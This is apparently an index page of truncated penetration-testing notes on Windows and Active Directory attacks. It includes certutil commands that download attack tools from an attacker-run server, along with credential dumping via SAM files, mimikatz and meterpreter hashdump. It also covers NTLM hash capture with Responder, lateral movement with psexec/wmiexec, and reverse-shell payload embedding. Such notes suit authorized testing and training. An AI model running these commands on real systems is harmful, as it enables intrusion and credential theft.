-
See also the Binary analysis post Windows uses as format for the executeable files the PE Portable Executeable format. This is a binary format which can be used as a English (light ‘xkcd’) — Imgur has a graphical overview.
-
Named pipes A named pipe is a method for remote or local IPC Inter-process communication. Basic commands Where is a program? where ssh Restart the system now: shutdown /r /t 0 Set file system attributes (which are shown with the dir command): attrib +r file.exe Set file system permissions (which are shown with the icacls command):…
-
Files with the extension .Library-ms are similar to macOS’s Volumes. They can contain files and directory which looks like local files on the Windows Explorer. Many AV/Malware systems does not detect them currently. Create a Windows Library “Directory” Preparation: Install somewhere a DAV share which is available from the victim’s system which points to a…
-
Keyboard functions CTRL+S Find sequence of commands SHIFT+F9 Pass exception
-
Assume you have a buffer overflow vulnerability. You can control the EIP. But your shellcode is never executed. Your shellcode is executed when a ret instruction is executed which calls the address you overwrite. But maybe the ret at the end of the function where the buffer overflow occurs is never reached, because you overwrote the…
-
SID Security Identifiers All elements have attributes. They are identified via a Security Identifier SID. The structure of a SID: Example: The Domain Identifier ist the SID without the last RID part. Examples for well-known SIDs: Basic Windows security access control Security context Mandatory Integrity Control and integrity levels Windows (from Vista on) has five integrity levels:…
-
-NET attack framework: https://github.com/cobbr/Covenant Usage Create a listener on the attack system. Add a launcher to the listener. The attack system now provides a payload file the victim has to start. You can use UrbanBishop to inject the payload into a running process. As soon as the payload is executed, Covenant will show on the dashboard…
-
File and directory integrity levels C:\Users\User>icacls hallo hallo NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) WINDEV2012EVAL\User:(I)(F) Mandatory Label\High Mandatory Level:(NW) (I)(F) means that the corresponding user or group has (F) Full permission on the file and that the permissions are inherited from the parent = directory. Note that the Read right ® also enables execution on that file! (There…
-
Various Show who else is logged in. qwinsta Open the Event Viewer and search in the looks. Have fun! Network enumeration Show the network configuration. Are there multiple interfaces? ipconfig /all Routing information route print Show current network connections. After checking this command: CHECK all ports with the previous found ones! netstat -ano Check the ARP cache…
-
Determine if the system has the WSL with bash: where /R C:\windows bash.exe If bash.exe is there and the WSL is running, then commands can be run as root (!) like: C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.19041.423_none_1da742a41b53e164\bash.exe whoami Install the WSL To install the WSL, a system shell is required unfortunatelly. See this article for installation.
-
Execution If you cannot execute an exe file, try these options: Windows firewall / netsh Check firewall state netsh advfirewall show currentprofile netsh advfirewall show state If the firewall is active, list the configuration: netsh advfirewall show config Example how to add exceptions into the firewall via the command line from an administrator: C:\Windows\temp> netsh advfirewall firewall…
-
Grab the SAM and system file: %windir%\repair\sam %windir%\System32\config\RegBack\SAM %windir%\system32\config\SAM %windir%\repair\system %windir%\System32\config\RegBack\system %windir%\system32\config\system (Re-) Run the credential retrievers from the script page.
-
Prepare the own system: cd p151.general.1/scripts/privesc/windows python -m SimpleHTTPServer 80 Prepare the target: set NTPSRV=$ownIp mkdir C:\Windows\System32\spool\drivers\color\wsc cd C:\Windows\System32\spool\drivers\color\wsc Download most scripts at once (>30 MB!): certutil.exe -urlcache -split -f "http://$NTPSRV/7za.exe certutil.exe -urlcache -split -f "http://$NTPSRV/_ex.zip 7za.exe x _ex.zip WinPeas Github winPEAS.batwinPEASx86.exewinPEASx64.exe Powerless Github certutil.exe -urlcache -split -f "http://$NTPSRV/Powerless.bat" Powerless.bat Powerless.bat Windows Exploit Suggester NG Github…
-
dir General: Usual commands: Therefore: Remember to use dir /R /as /ah -force. tree Start with creating a list of all directories and files. Download it. It’s way easier to look in a local editor and it’s stored for the future as well. tree c:\ > C:\Windows\Temp\dsys\dirs.txtdir /s /R /as /ah c:\ > C:\Windows\Temp\dsys\files.txt(Download the files)…
-
General system enumeration Get general information about the OS: systeminfo Get the environment variabes: set Enumerate cached credentials: cmdkey /list If the current system is not known yet, try to determine the version via one of the following files: Processes enumeration tasklist /Vtasklist /V | find "cmd.exe" // Search for a commandtasklist /V /fi "USERNAME eq NT…
-
After these steps, more things to do: Work with processes For enumeration of processes, see the Basic Windows system enumeration post. Kill a process taskkill /PID $pid taskkill /IM notepad.exe pskill /accepteula $pid // With SysinternalTools Suspend and continue a running process with SysinternalTools: pssuspend /accepteula notepad.exe ... pssuspend /accepteula -r notepad.exe Work with DLL’s Show all…
-
responder: Listen with responder on a network and wait for AD systems to ask for a DC. This can reveal a NTLM hash. (Source) Start responder on the own system: sudo responder -I tun0 --wpad Connect from the target system to this system via smb. In the Windows explorer, or in the command line via dir…
-
With username/password With psexec (Prerequisites: ADMIN$ share is available, the user is part of the local administrator group on the target) With psexec via Metasploit use exploit/windows/smb/psexec With atexec (Impacket) atexec.py dom/user:pass@$target cmd.exe With wmiexec wmiexec.py domain.local/$target:$password@$ip With Smbmap smbmap -u ariley -p 'pass' -d WORKGROUP -x 'whoami' -H $target With Wmic (To run a…
-
Automates Windows enumeration. Github page Usage Seatbelt.exe -group=all Run Seatbelt.exe without arguments to see possible parameters. Example Seatbelt.exe OSInfo Processes Remote From another Windows system, seatbelt can connect to a victim and perform commands there. Seatbelt.exe LogonSessions -computername=$victim -username=bob -password=bobber Command aggregation There are already some groups defined which perform multiple tests at once. Seatbelt.exe -group=system [-computername=...]Seatbelt.exe…
-
The DPAPI is a Windows system which stored passwords bound to the local system. In the user directory there are the keys stored in the AppData\Roaming\Microsoft\Protect\<SID> directory. From the user’s password, a master key is derived. When the user changes his password, a new master key is generated as well — and all old master…
-
Shellter kann add a reverse shell payload into a exe file.
-
Logon on another system with a NTLM hash Scenario: Then, use mimikatz to inject another user’s NTLM hash into the secret storage: Steal another user’s session Scenario: Then, with the use of mimikatz: privilege::debugsekurlsa::tickets /export This exports available tickets into the working directory (suffix .kirbi). Then, choose one file/ticket from the correct user and service. For…
-
Windows creates and stores credentials in the Local Security Authority Subsystem Service LSASS in the memory. On the filesystem, the sam database stores the hashes. Use Mimikatz Usage Enable debug mode. This usess the SeDebugPrivilege so that we are able to communicate with other processes. privilege:debug Try to elevate privileges to obtain SYSTEM user privileges:…
-
BloodHound analyzes and present Active Directory Data. SharpHound is the data collector which runs on a compromised AD system. On the target: On the own system:
-
Without shell access With shell access Choose one method to enumerate. 1. User and group enumeration with net (!) See what roles/privileges THIS USER has. Also localy. Maybe he/she has already administrative privileges. whoami /all List (and store!) the users of the domain net user /domain List (and store!) information like full names, group memberships, etc.…
-
Collection of privsec scripts. To start, upload PowerView.ps1 and: powershell -exec bypass PS> Import-Module .\PowerView.ps1 See the github site for all commands. General enumeration powershell -exec bypass PS> . .\PowerUp.ps1 PS> Invoke-AllChecks Or: powershell.exe -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks" About users Enumerates all users. Get-NetUser Enumerate all users which does not require Kerberos preauth. Get-NetUser -PreauthNotRequired Returns…
-
Mainly post exploitation for AD environments. (Download — also included in Kali sources) Quick usage for privilege escalation General usage Metasploit syntax / PSE syntax Note: After usemodule don’t forget to go “back” and to “interact” with the agent to see job results! Commands with an asterix require a high-integrity Empire Agent. To upgrade one…
-
The Windows registry is a central data storage for the operation system as well as for applications. It’s a key-value storage in a tree structure. A hive is a set of keys and their values. The root hives are: Short Long Content Source file HKCR HKEY_CLASSES_ROOT Information about file types and properties HKCC HKEY_CURRRENT_CONFIG Information about…
-
Checklist A domain of a DC consists out of the following elements: An object in AD may have a set of ACE Access Control Entries which is called ACL Access Control List. An object’s ACE can be retrieved in PS with Get-ObjectAcl [-Identity| $object. The SCM Service Control Manager contains a database of installed services…
-
Windows clients use SAM files. Windows DC uses ntds.dit to store all hashes from the domain. SAM C:\windows\repair\sam C:\windows\System32\config\SAM C:\windows\System32\config\RegBack\SAM Alternatives in meterpreter: run post/windows/gather/hashdump run post/windows/gather/smart_hashdump run hashdump hashdump (load module before: use priv) creds_all If hashdump doesn’t work: Notes Format Username : UID : LM hash : NTLM hash : : : For hashcat,…